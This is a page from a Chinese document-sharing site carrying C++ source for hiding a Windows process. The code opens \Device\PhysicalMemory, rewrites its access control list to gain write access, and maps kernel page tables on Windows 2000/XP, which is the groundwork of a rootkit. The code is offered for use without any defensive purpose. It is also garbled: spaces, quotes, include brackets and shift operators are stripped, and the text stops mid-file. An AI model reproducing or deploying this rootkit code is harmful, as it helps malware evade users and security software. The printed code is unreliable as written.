VC隐藏进程资料

fxg823
1 ℃
2020-06-12

整理文档很辛苦，赏杯茶钱您下走！

还剩 ... 页未读，继续阅读 >>

免费阅读已结束，点击下载阅读编辑剩下 ... 页

阅读已结束，您可以下载文档离线阅读编辑

资源描述

头文件：////////////////////////////////////////HideProcess.hBOOLHideProcess();CPP源文件：///////////////////////////////////////////////////////////////////////////////HideProcess.cpp#includewindows.h#includeAccctrl.h#includeAclapi.h#includeHideProcess.h#defineNT_SUCCESS(Status)((NTSTATUS)(Status)=0)#defineSTATUS_INFO_LENGTH_MISMATCH((NTSTATUS)0xC0000004L)#defineSTATUS_ACCESS_DENIED((NTSTATUS)0xC0000022L)typedefLONGNTSTATUS;typedefstruct_IO_STATUS_BLOCK{NTSTATUSStatus;ULONGInformation;}IO_STATUS_BLOCK,*PIO_STATUS_BLOCK;typedefstruct_UNICODE_STRING{USHORTLength;USHORTMaximumLength;PWSTRBuffer;}UNICODE_STRING,*PUNICODE_STRING;#defineOBJ_INHERIT0x00000002L#defineOBJ_PERMANENT0x00000010L#defineOBJ_EXCLUSIVE0x00000020L#defineOBJ_CASE_INSENSITIVE0x00000040L#defineOBJ_OPENIF0x00000080L#defineOBJ_OPENLINK0x00000100L#defineOBJ_KERNEL_HANDLE0x00000200L#defineOBJ_VALID_ATTRIBUTES0x000003F2Ltypedefstruct_OBJECT_ATTRIBUTES{ULONGLength;HANDLERootDirectory;PUNICODE_STRINGObjectName;ULONGAttributes;PVOIDSecurityDescriptor;PVOIDSecurityQualityOfService;}OBJECT_ATTRIBUTES,*POBJECT_ATTRIBUTES;typedefNTSTATUS(CALLBACK*ZWOPENSECTION)(OUTPHANDLESectionHandle,INACCESS_MASKDesiredAccess,INPOBJECT_ATTRIBUTESObjectAttributes);typedefVOID(CALLBACK*RTLINITUNICODESTRING)(INOUTPUNICODE_STRINGDestinationString,INPCWSTRSourceString);RTLINITUNICODESTRINGRtlInitUnicodeString;ZWOPENSECTIONZwOpenSection;HMODULEg_hNtDLL=NULL;PVOIDg_pMapPhysicalMemory=NULL;HANDLEg_hMPM=NULL;OSVERSIONINFOg_osvi;//---------------------------------------------------------------------------BOOLInitNTDLL(){g_hNtDLL=LoadLibrary(ntdll.dll);if(NULL==g_hNtDLL)returnFALSE;RtlInitUnicodeString=(RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL,RtlInitUnicodeString);ZwOpenSection=(ZWOPENSECTION)GetProcAddress(g_hNtDLL,ZwOpenSection);returnTRUE;}//---------------------------------------------------------------------------VOIDCloseNTDLL(){if(NULL!=g_hNtDLL)FreeLibrary(g_hNtDLL);g_hNtDLL=NULL;}//---------------------------------------------------------------------------VOIDSetPhyscialMemorySectionCanBeWrited(HANDLEhSection){PACLpDacl=NULL;PSECURITY_DESCRIPTORpSD=NULL;PACLpNewDacl=NULL;DWORDdwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,&pDacl,NULL,&pSD);if(ERROR_SUCCESS!=dwRes){if(pSD)LocalFree(pSD);if(pNewDacl)LocalFree(pNewDacl);}EXPLICIT_ACCESSea;RtlZeroMemory(&ea,sizeof(EXPLICIT_ACCESS));ea.grfAccessPermissions=SECTION_MAP_WRITE;ea.grfAccessMode=GRANT_ACCESS;ea.grfInheritance=NO_INHERITANCE;ea.Trustee.TrusteeForm=TRUSTEE_IS_NAME;ea.Trustee.TrusteeType=TRUSTEE_IS_USER;ea.Trustee.ptstrName=CURRENT_USER;dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);if(ERROR_SUCCESS!=dwRes){if(pSD)LocalFree(pSD);if(pNewDacl)LocalFree(pNewDacl);}dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);if(ERROR_SUCCESS!=dwRes){if(pSD)LocalFree(pSD);if(pNewDacl)LocalFree(pNewDacl);}}//---------------------------------------------------------------------------HANDLEOpenPhysicalMemory(){NTSTATUSstatus;UNICODE_STRINGphysmemString;OBJECT_ATTRIBUTESattributes;ULONGPhyDirectory;g_osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);GetVersionEx(&g_osvi);if(5!=g_osvi.dwMajorVersion)returnNULL;switch(g_osvi.dwMinorVersion){case0:PhyDirectory=0x30000;break;//2kcase1:PhyDirectory=0x39000;break;//xpdefault:returnNULL;}RtlInitUnicodeString(&physmemString,L\\Device\\PhysicalMemory);attributes.Length=sizeof(OBJECT_ATTRIBUTES);attributes.RootDirectory=NULL;attributes.ObjectName=&physmemString;attributes.Attributes=0;attributes.SecurityDescriptor=NULL;attributes.SecurityQualityOfService=NULL;status=ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);if(status==STATUS_ACCESS_DENIED){status=ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);SetPhyscialMemorySectionCanBeWrited(g_hMPM);CloseHandle(g_hMPM);status=ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);}if(!NT_SUCCESS(status))returnNULL;g_pMapPhysicalMemory=MapViewOfFile(g_hMPM,FILE_MAP_READ|FILE_MAP_WRITE,0,PhyDirectory,0x1000);if(g_pMapPhysicalMemory==NULL)returnNULL;returng_hMPM;}//---------------------------------------------------------------------------PVOIDLinearToPhys(PULONGBaseAddress,PVOIDaddr){ULONGVAddr=(ULONG)addr,PGDE,PTE,PAddr;PGDE=BaseAddress[VAddr22];if(0==(PGDE&1))return0;ULONGtmp=PGDE&0x00000080;if(0!=tmp){PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);}else{PGDE=(ULONG)MapViewOfFile(g_hMPM,4,0,PGDE&0xfffff000,0x1000);PTE=((PULONG)PGDE)[(VAddr&0x003FF000)12];if(0==(PTE&1))return0;PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);UnmapViewOfFile((PVOID)PGDE);}return(PVOID)PAddr;}//---------------------------------------------------------------------------ULONGGetData(PVOIDaddr){ULONGphys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);PULONGtmp=(PULONG)MapViewOfFile(g_hMPM,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&0xfffff000,0x1000);if(0==tmp)return0;ULONGret=tmp[(phys&0xFFF)2];UnmapViewOfFile(tmp);returnret;}//---------------